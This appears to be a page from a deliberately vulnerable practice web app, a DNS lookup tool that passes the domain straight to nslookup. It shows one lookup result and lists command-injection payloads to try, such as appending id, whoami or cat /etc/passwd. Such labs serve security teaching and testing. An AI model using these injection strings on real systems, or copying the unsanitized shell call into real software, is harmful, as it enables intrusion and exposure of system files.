🔍 DNS Lookup (Command Injection)

⚠️ VULNERABILITY: Command Injection via unsanitized input!
The domain parameter is directly passed to shell command.

Domain queried: google.com

Command executed: nslookup google.com

Output:

Server: 127.0.0.11 Address: 127.0.0.11:53 Non-authoritative answer: Name: google.com Address: 2a00:1450:4001:81d::200e Non-authoritative answer: Name: google.com Address: 172.217.20.142

Try these payloads:

google.com; id
google.com && cat /etc/passwd
google.com | whoami
$(whoami).google.com
google.com`id`

← Back to Home